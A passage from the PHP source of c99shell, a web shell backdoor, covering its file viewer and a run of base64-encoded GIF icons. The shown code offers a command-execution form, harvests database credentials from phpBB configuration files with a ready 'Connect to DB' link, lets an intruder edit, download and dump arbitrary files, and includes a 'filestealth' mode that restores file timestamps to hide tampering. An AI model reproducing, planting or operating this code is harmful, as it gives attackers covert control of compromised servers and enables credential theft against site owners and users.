  2999. echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  3000. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  3001. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  3002. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  3003. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  3004. <P>";
  3005. }
  3006. elseif ($ft == "html")
  3007. {
  3008. if ($white) {@ob_clean();}
  3009. echo $r;
  3010. if ($white) {c99shexit();}
  3011. }
  3012. elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  3013. elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  3014. elseif ($ft == "phpsess")
  3015. {
  3016. echo "<pre>";
  3017. $v = explode("|",$r);
  3018. echo $v[0]."<br>";
  3019. var_dump(unserialize($v[1]));
  3020. echo "</pre>";
  3021. }
  3022. elseif ($ft == "exe")
  3023. {
  3024. $ext = explode(".",$f);
  3025. $c = count($ext)-1;
  3026. $ext = $ext[$c];
  3027. $ext = strtolower($ext);
  3028. $rft = "";
  3029. foreach($exeftypes as $k=>$v)
  3030. {
  3031. if (in_array($ext,$v)) {$rft = $k; break;}
  3032. }
  3033. $cmd = str_replace("%f%",$f,$rft);
  3034. echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  3035. }
  3036. elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  3037. elseif ($ft == "code")
  3038. {
  3039. if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
  3040. {
  3041. $arr = explode("\n",$r);
  3042. if (count($arr == 18))
  3043. {
  3044. include($d.$f);
  3045. echo "<b>phpBB configuration is detected in this file!<br>";
  3046. if ($dbms == "mysql4") {$dbms = "mysql";}
  3047. if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  3048. else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
  3049. echo "Parameters for manual connect:<br>";
  3050. $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  3051. foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  3052. echo "</b><hr size=\"1\" noshade>";
  3053. }
  3054. }
  3055. echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  3056. if (!empty($white)) {@ob_clean();}
  3057. highlight_file($d.$f);
  3058. if (!empty($white)) {c99shexit();}
  3059. echo "</div>";
  3060. }
  3061. elseif ($ft == "download")
  3062. {
  3063. @ob_clean();
  3064. header("Content-type: application/octet-stream");
  3065. header("Content-length: ".filesize($d.$f));
  3066. header("Content-disposition: attachment; filename=\"".$f."\";");
  3067. echo $r;
  3068. exit;
  3069. }
  3070. elseif ($ft == "notepad")
  3071. {
  3072. @ob_clean();
  3073. header("Content-type: text/plain");
  3074. header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  3075. echo($r);
  3076. exit;
  3077. }
  3078. elseif ($ft == "img")
  3079. {
  3080. $inf = getimagesize($d.$f);
  3081. if (!$white)
  3082. {
  3083. if (empty($imgsize)) {$imgsize = 20;}
  3084. $width = $inf[0]/100*$imgsize;
  3085. $height = $inf[1]/100*$imgsize;
  3086. echo "<center><b>Size:</b>&nbsp;";
  3087. $sizes = array("100","50","20");
  3088. foreach ($sizes as $v)
  3089. {
  3090. echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  3091. if ($imgsize != $v ) {echo $v;}
  3092. else {echo "<u>".$v."</u>";}
  3093. echo "</a>&nbsp;&nbsp;&nbsp;";
  3094. }
  3095. echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  3096. }
  3097. else
  3098. {
  3099. @ob_clean();
  3100. $ext = explode($f,".");
  3101. $ext = $ext[count($ext)-1];
  3102. header("Content-type: ".$inf["mime"]);
  3103. readfile($d.$f);
  3104. exit;
  3105. }
  3106. }
  3107. elseif ($ft == "edit")
  3108. {
  3109. if (!empty($submit))
  3110. {
  3111. if ($filestealth) {$stat = stat($d.$f);}
  3112. $fp = fopen($d.$f,"w");
  3113. if (!$fp) {echo "<b>Can't write to file!</b>";}
  3114. else
  3115. {
  3116. echo "<b>Saved!</b>";
  3117. fwrite($fp,$edit_text);
  3118. fclose($fp);
  3119. if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  3120. $r = $edit_text;
  3121. }
  3122. }
  3123. $rows = count(explode("\r\n",$r));
  3124. if ($rows < 10) {$rows = 10;}
  3125. if ($rows > 30) {$rows = 30;}
  3126. echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  3127. }
  3128. elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  3129. else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  3130. }
  3131. }
  3132. }
  3133. else
  3134. {
  3135. @ob_clean();
  3136. $images = array(
  3137. "arrow_ltr"=>
  3138. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  3139. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  3140. "back"=>
  3141. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  3142. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  3143. "Wg0JADs=",
  3144. "buffer"=>
  3145. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  3146. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  3147. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  3148. "change"=>
  3149. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  3150. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  3151. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  3152. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  3153. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  3154. "zMshADs=",
  3155. "delete"=>
  3156. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  3157. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  3158. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  3159. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  3160. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  3161. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3162. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  3163. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  3164. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  3165. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  3166. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  3167. "download"=>
  3168. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  3169. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  3170. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  3171. "forward"=>
  3172. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  3173. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  3174. "WqsJADs=",
  3175. "home"=>
  3176. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  3177. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  3178. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  3179. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  3180. "mode"=>
  3181. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
  3182. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
  3183. "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
  3184. "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
  3185. "refresh"=>
  3186. "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
  3187. "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
  3188. "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
  3189. "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
  3190. "search"=>
  3191. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
  3192. "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
  3193. "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
  3194. "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
  3195. "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
  3196. "setup"=>
  3197. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  3198. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  3199. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  3200. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  3201. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  3202. "small_dir"=>
  3203. "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
  3204. "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
  3205. "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  3206. "small_unk"=>
  3207. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
  3208. "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
  3209. "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
  3210. "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
  3211. "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
  3212. "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
  3213. "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
  3214. "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
  3215. "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3216. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3217. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3218. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3219. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3220. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3221. "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
  3222. "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
  3223. "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
  3224. "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
  3225. "yAsokBkQADs=",
  3226. "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
  3227. "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
  3228. "sort_asc"=>
  3229. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  3230. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  3231. "sort_desc"=>
  3232. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  3233. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  3234. "sql_button_drop"=>
  3235. "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  3236. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3237. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  3238. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  3239. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  3240. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  3241. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  3242. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  3243. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  3244. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  3245. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  3246. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  3247. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  3248. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
  3249. "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
  3250. "AQEAOw==",
  3251. "sql_button_empty"=>
  3252. "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  3253. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3254. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  3255. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  3256. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  3257. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  3258. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  3259. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  3260. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  3261. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  3262. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  3263. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  3264. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  3265. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
  3266. "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
  3267. "sql_button_insert"=>
  3268. "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  3269. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3270. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  3271. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  3272. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  3273. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  3274. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  3275. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  3276. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  3277. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  3278. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  3279. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  3280. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  3281. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
  3282. "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
  3283. "up"=>
  3284. "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
  3285. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
  3286. "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
  3287. "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
  3288. "write"=>
  3289. "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
  3290. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
  3291. "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
  3292. "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
  3293. "ext_asp"=>
  3294. "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
  3295. "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
  3296. "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
  3297. "ext_mp3"=>
  3298. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
  3299. "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
  3300. "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
  3301. "ext_avi"=>
  3302. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
  3303. "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
  3304. "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
  3305. "ext_cgi"=>
  3306. "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
  3307. "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
  3308. "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
  3309. "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
  3310. "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3311. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3312. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
